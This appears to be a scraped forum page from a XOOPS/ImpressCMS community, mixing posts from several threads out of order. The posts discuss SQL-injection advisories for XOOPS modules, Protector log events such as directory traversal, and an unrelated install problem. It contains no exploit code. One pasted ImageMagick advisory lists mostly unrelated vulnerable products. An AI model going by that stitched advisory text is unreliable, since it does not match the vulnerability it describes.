Ah, thanks for that Shine.
I was worried for a while there, as I mentioned I got many sites running on the latest X and with DJ's article module.
Thanks again
Thanks for clearing this up Shine.
I am quit sure this vulnerability concerns the module: articleS 1.03 from AndyM.
http://support.sirium.net/modules/mydownloads/viewcat.php?cid=2
The alert says:
Xoops All Version -(module)Articles- (file)Article.PHP
modules/articles/article.php
So this concerns NOT DJ's module article.
I hope this vulnerability isn't in the X core as well as the module, as I've got many sites running on the latest versions of XOOPS.
Perhaps it could be the other article module?
http://xoopsforge.com/modules/wordpress/index.php/get-latest-xoops-modules/
Article: the advanced article management module, could also serve as blog or news management
article 1.00 Final
Could be - wasn't sure if it was "article" or "articles".
David I think he means DJ's Article module?
Thanks Giba - which module is this ?
XOOPS Article module is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it
Source: http://www.securityfocus.com/bid/28879/references
XOOPS Recette is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Recette 2.2 is vulnerable to this issue; other versions may also be affected.
Quote:
Bugtraq ID: 28859
Class: Input Validation Error
CVE:
Remote: Yes
Local: No
Published: Apr 19 2008 12:00AM
Updated: Apr 21 2008 06:17PM
Credit: S@BUN
Vulnerable: Xoops Recette 2.2
I'm seeing a lot of stuff similar to the above and more in protector logs across a couple of sites, starting from 12 April. Anyone finding stuff like this in their logs? (see picture, Protector won't let me post all the bad stuff here :)
Quote:
i mean this one cuz i've never seen it on protector . at the end of the log there is a pwd !
this mean that the attacker has the access to my site ?
the dos report might not be malicious. bare that in mind :)
you can get a log of a dos attack with protector, when you are refreshing the page so many times, or if you get your password wrong and post again too quickly.. it can log it as a DOS event. but that's not a reason to dismiss the DOS. but it's advisory to still investigate the source ip of the log entry to determine if it was an intentional DOS attack or just an over zealous user.
you'll do better checking the server logs and comparing to protector logs.. it's more likely that a proper malicious DOS attack would be detected and stopped by the servers firewall.
Quote:
skenow wrote:
DIRECTORY TRAVERSAL - definitely an attempt to find a server vulnerability and read password or configuration files, or find folders/files that are world writable
You have several different events, each with different severities -
CRAWLER - often a result of search bots crawling and indexing your site, but also can be someone copying your site. I often see this associated with Firefox users because FF has a prefetch 'feature' that scans the current page for links and begins to cache the linked pages.
DIRECTORY TRAVERSAL - definitely an attempt to find a server vulnerability and read password or configuration files, or find folders/files that are world writable
URI SPAM - The usual suspects - spammers trying to get their links on your site. The SPAM POINTS are the number of urls in the POST
DoS (denial of service) - flooding the server with requests in an attempt to bring it down, making your site inaccessible. Wikipedia: Denial of Service
hi,today i've found a log on protector that i didnt understand is is harmful?
i've attached a screenshot
Reported by: SecurityFocus
ImageMagick is prone to multiple integer-overflow vulnerabilities because it fails to properly validate user-supplied data.
An attacker can exploit these issues to execute arbitrary code in the context of the application. Failed exploit attempts will likely cause denial-of-service conditions.
Vulnerable: XFree86 X11R6 4.3 .0.2
XFree86 X11R6 4.3 .0.1
XFree86 X11R6 4.3 .0
+ MandrakeSoft Corporate Server 3.0 x86_64
+ MandrakeSoft Corporate Server 3.0
+ MandrakeSoft Linux Mandrake 10.0 AMD64
+ MandrakeSoft Linux Mandrake 10.0
+ MandrakeSoft Linux Mandrake 9.2 amd64
+ MandrakeSoft Linux Mandrake 9.2
+ MandrakeSoft Linux Mandrake 9.1 ppc
+ MandrakeSoft Linux Mandrake 9.1
+ RedHat Fedora Core1
+ RedHat Linux 9.0 i386
+ Slackware Linux 9.1
+ Slackware Linux 9.0
+ Slackware Linux -current
+ Turbolinux Turbolinux Desktop 10.0
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
X.org X11R7 1.1.1
X.org libx11 1.0
Ubuntu Ubuntu Linux 7.04 sparc
Ubuntu Ubuntu Linux 7.04 powerpc
Ubuntu Ubuntu Linux 7.04 i386
Ubuntu Ubuntu Linux 7.04 amd64
Ubuntu Ubuntu Linux 6.10 sparc
Ubuntu Ubuntu Linux 6.10 powerpc
Ubuntu Ubuntu Linux 6.10 i386
Ubuntu Ubuntu Linux 6.10 amd64
Ubuntu Ubuntu Linux 6.06 LTS sparc
Ubuntu Ubuntu Linux 6.06 LTS powerpc
Ubuntu Ubuntu Linux 6.06 LTS i386
Ubuntu Ubuntu Linux 6.06 LTS amd64
Turbolinux wizpy 0
Turbolinux Turbolinux Server 10.0
Turbolinux Turbolinux Server 10.0.0 x64
Turbolinux Turbolinux Desktop 10.0
Turbolinux Turbolinux FUJI
Turbolinux Turbolinux 10 F...
TurboLinux Personal
TurboLinux Multimedia
Turbolinux FUJI 0
TransSoft Broker FTP Server 8.0
Sun Solaris 10.0 _x86
Sun Solaris 10.0
Sun Solaris 9_x86
Sun Solaris 9
Sun Solaris 8_x86
Sun Solaris 8
SGI ProPack 3.0 SP6
S.u.S.E. UnitedLinux 1.0
S.u.S.E. SuSE Linux Standard Server 8.0
S.u.S.E. SuSE Linux School Server for i386
S.u.S.E. SUSE LINUX Retail Solution 8.0
S.u.S.E. SuSE Linux Openexchange Server 4.0
S.u.S.E. SUSE Linux Enterprise Server 9 SP3
S.u.S.E. SUSE Linux Enterprise Server 10
S.u.S.E. SUSE Linux Enterprise Desktop 10
S.u.S.E. SLE SDK 9
S.u.S.E. SLE SDK 10
S.u.S.E. openSUSE 10.3
S.u.S.E. openSUSE 10.2
S.u.S.E. Open-Enterprise-Server 9.0
S.u.S.E. Open-Enterprise-Server 1
S.u.S.E. Open-Enterprise-Server 0
S.u.S.E. Novell Linux POS 9
S.u.S.E. Novell Linux Desktop 1.0
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 10.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 10.2 x86_64
S.u.S.E. Linux Professional 10.2
S.u.S.E. Linux Professional 10.1
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 10.2 x86_64
S.u.S.E. Linux Personal 10.2
S.u.S.E. Linux Personal 10.1
S.u.S.E. Linux Enterprise Server SDK 9
S.u.S.E. Linux Enterprise Server 9-SP3
+ Linux kernel 2.6.5
S.u.S.E. Linux Enterprise Server 10
+ Linux kernel 2.6.5
S.u.S.E. Linux Enterprise SDK 10
S.u.S.E. Linux Desktop 10
S.u.S.E. Linux 9.3 x86-64
S.u.S.E. Linux 9.3 x86
S.u.S.E. Linux 10.1 x86-64
S.u.S.E. Linux 10.1 x86
S.u.S.E. Linux 10.1 ppc
S.u.S.E. Linux 10.0 x86-64
S.u.S.E. Linux 10.0 x86
S.u.S.E. Linux 10.0 ppc
rPath rPath Linux 1
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux WS 2.1 IA64
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux ES 2.1 IA64
RedHat Enterprise Linux ES 2.1
RedHat Enterprise Linux Desktop Workstation 5 client
RedHat Enterprise Linux Desktop 5 client
RedHat Enterprise Linux AS 4
RedHat Enterprise Linux AS 3
RedHat Enterprise Linux AS 2.1 IA64
RedHat Enterprise Linux AS 2.1
RedHat Enterprise Linux 5 server
RedHat Desktop 4.0
RedHat Desktop 3.0
RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
RedHat Advanced Workstation for the Itanium Processor 2.1
Pardus Linux 2007.1
OpenBSD OpenBSD 4.0
OpenBSD OpenBSD 3.9
MandrakeSoft Linux Mandrake 2007.1 x86_64
MandrakeSoft Linux Mandrake 2007.1
MandrakeSoft Linux Mandrake 2007.0 x86_64
MandrakeSoft Linux Mandrake 2007.0
MandrakeSoft Corporate Server 4.0 x86_64
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
MandrakeSoft Corporate Server 4.0
ImageMagick ImageMagick 6.3.3-3
ImageMagick ImageMagick 6.3.2
ImageMagick ImageMagick 6.3.1
ImageMagick ImageMagick 6.2.9
Gentoo Linux
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
Debian Linux 4.0 sparc
Debian Linux 4.0 s/390
Debian Linux 4.0 powerpc
Debian Linux 4.0 mipsel
Debian Linux 4.0 mips
Debian Linux 4.0 m68k
Debian Linux 4.0 ia-64
Debian Linux 4.0 ia-32
Debian Linux 4.0 hppa
Debian Linux 4.0 arm
Debian Linux 4.0 amd64
Debian Linux 4.0 alpha
Debian Linux 4.0
Avaya Messaging Storage Server MSS 3.0
Avaya Messaging Storage Server
Avaya Message Networking MN 3.1
Avaya Message Networking
Avaya Interactive Response 1.3
Avaya Interactive Response 2.0
Avaya Integrated Management 2.1
Avaya Integrated Management
Avaya CMS Server 13.0
Avaya CMS Server 12.0
Avaya CMS Server 11.0
Avaya CMS Server 9.0
Avaya CMS Server 14.0
Avaya CMS Server 13.1
Apple Safari 3.0.3
Apple Safari 3.0.2 Beta for Windows
Apple Safari 3.0.1 Beta for Windows
Apple Safari 3 Beta for Windows
There were no real issues from my side, I re-uploaded all the files to ensure they were done correctly, then installed it again and it worked straight out of the box.
The mainfile.php originally showed as being blank before I installed.
I believe taritrott is using some kind of web browser FTP, not sure if this caused some complications.
there was also another folder with ImpressCMS in, which was not web root (one above), It's possible he could of been uploading there rather than the web root where the main ImpressCMS was to be.
Thanks Tom,
What was the problem? How can we improve our installation script to avoid these kind of problem ?